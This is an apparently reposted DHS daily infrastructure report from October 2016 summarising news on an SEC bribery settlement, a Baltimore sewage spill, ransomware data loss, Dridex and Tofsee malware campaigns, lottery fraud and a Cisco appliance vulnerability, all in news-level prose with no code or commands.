Monday, October 03, 2016



Complete DHS Report for October 03, 2016

Daily Report                                            

Top Stories

• Och-Ziff Capital Management Group agreed to pay $200 million September 29 to settle charges that the firm’s executives used intermediaries and business partners to pay bribes to high-level government officials in Africa in order to secure mining rights. – U.S. Securities and Exchange Commission See item 4 below in the Financial Services Sector

• The Baltimore City Department of Public Works reported September 29 that more than 10,000 gallons of sewage and rainwater flowed into the Jones Falls following severe rainstorms in the area that began September 28. – WBFF 45 Baltimore

18. September 29, WBFF 45 Baltimore – (Maryland) At least 10,000 gallons of sewage, rainwater released into Jones Falls: DPW. The Baltimore City Department of Public Works reported September 29 that more than 10,000 gallons of sewage and rainwater flowed into the Jones Falls following severe rainstorms in the area that began September 28. City officials advised the public to avoid contact with urban streams. Source: http://foxbaltimore.com/news/local/at-least-10000-gallons-of-sewer-water-released-into-jones-falls-dpw

• The Texas Water Development Board awarded a $5.4 million loan to the City of Edinburg, Texas September 22 to complete the expansion of the city’s West Water Treatment Plant. – Edinburg Review

19. September 29, Edinburg Review – (Texas) Edinburg awarded $5.4 million to finish water treatment plant upgrade. The Texas Water Development Board awarded a $5.4 million loan to the City of Edinburg, Texas September 22 through the agency’s Drinking Water State Revolving Fund to complete the expansion of the city’s West Water Treatment Plant. The expansion includes adding 2 raw water pumps, 2 contact reactor clarifiers, and a 2 million gallon ground storage tank, among other improvements. Source: http://www.edinburgreview.com/news/20160929/edinburg-awarded-54-million-to-finish-water-treatment-plant-upgrade

• The Marin Healthcare District and Prima Medical Foundation announced September 28 that more than 5,000 patient’s medical data was lost due to a glitch in their system following a July ransomware attack. – Marin Independent Journal

20. September 30, Marin Independent Journal – (California) Marin patients’ medical data lost after cyber attack. The Marin Healthcare District and Prima Medical Foundation announced September 28 they are notifying more than 5,000 patients that their medical data, including limited clinical history, vital signs, and documentation of physical examinations, among other information, was lost due to a glitch in Marin Medical Practice Concepts’ system following a ransomware attack in July. Officials stated patients’ personal, financial, and health information was not accessed, viewed, or transferred. Source: http://www.marinij.com/article/NO/20160929/NEWS/160929766
  
Financial Services Sector

4. September 29, U.S. Securities and Exchange Commission – (International) Och-Ziff executives also settle charges. The U.S. Securities and Exchange Commission (SEC) announced September 29 that Och-Ziff Capital Management Group agreed to pay roughly $200 million to settle charges that the firm’s executives disregarded red flags and corruption risks as determined by the Foreign Corrupt Practices Act (FCPA), and used intermediaries, agents, and business partners to pay bribes to high-level government officials in Africa in order to secure mining rights and corruptly influence government officials in 5 African countries. SEC officials stated that Och-Ziff fraudulently documented the bribe payments and neglected to maintain proper internal controls to recognize or prevent the bribes. Source: https://www.sec.gov/news/pressrelease/2016-203.html

5. September 29, SecurityWeek – (International) Dridex banking trojan adopts improved encryption. MalwareTech security researchers discovered the Dridex banking trojan started using malicious Rich Text Format (RTF) files that are password protected in order to prevent automated systems from scanning the attachment for malicious code and to avoid detection. Researchers also found Dridex employs delayed execution and may be focused on infecting corporate systems.

6. September 28, U.S. Department of Justice – (International) Dual Jamaican-U.S. citizen pleads guilty in connection with Jamaica-based lottery fraud scheme. A dual Jamaican and U.S. citizen pleaded guilty September 28 for her role in a Jamaica-based fraudulent lottery scheme where she persuaded U.S. citizens to send her hundreds of thousands of dollars to cover fraudulent fees for lottery winnings that victims had not won and never obtained, causing U.S. citizens tens of millions of dollars in losses from 2011 – 2012. The charges state the dual citizen used some of the funds for personal expenses. Source: https://www.justice.gov/opa/pr/dual-jamaican-us-citizen-pleads-guilty-connection-jamaica-based-lottery-fraud-scheme

Information Technology Sector

23. September 30, SecurityWeek – (International) Tofsee malware distribution switched from exploit kit to spam. Security researchers from Cisco Talos reported that attackers stopped distributing the Tofsee ransomware via the RIG exploit kit (EK), and began leveraging spam email campaigns to deliver the malware downloaders, which instruct victims to download and open the ZIP archive attached to the message that contains an obfuscated JavaScript file with a WScript downloader, which runs an executable from a remote server controlled by the attacker. Researchers stated the malware allows hackers to conduct cryptocurrency mining, carry out distributed denial-of-service (DDoS) attacks, and send spam, among other malicious actions.

For another story, see item 2 below from the Critical Manufacturing Sector

2. September 30, SecurityWeek – (International) Cisco forgets to remove testing interface from security appliance. Cisco inadvertently introduced a critical vulnerability in both its physical and virtual Email Security Appliances (ESA) running IronPort and AsyncOS software that could allow a remote attacker to gain control of the affected device with root privileges due to an internal testing and debugging interface that attacks can connect to without authorization. Cisco advised users to reboot their devices using the reboot command from the command-line interface in order to disable the internal testing and debugging interface. Source: http://www.securityweek.com/cisco-forgets-remove-testing-interface-security-appliance

Communications Sector

See item 2 above in the Information Technology Sector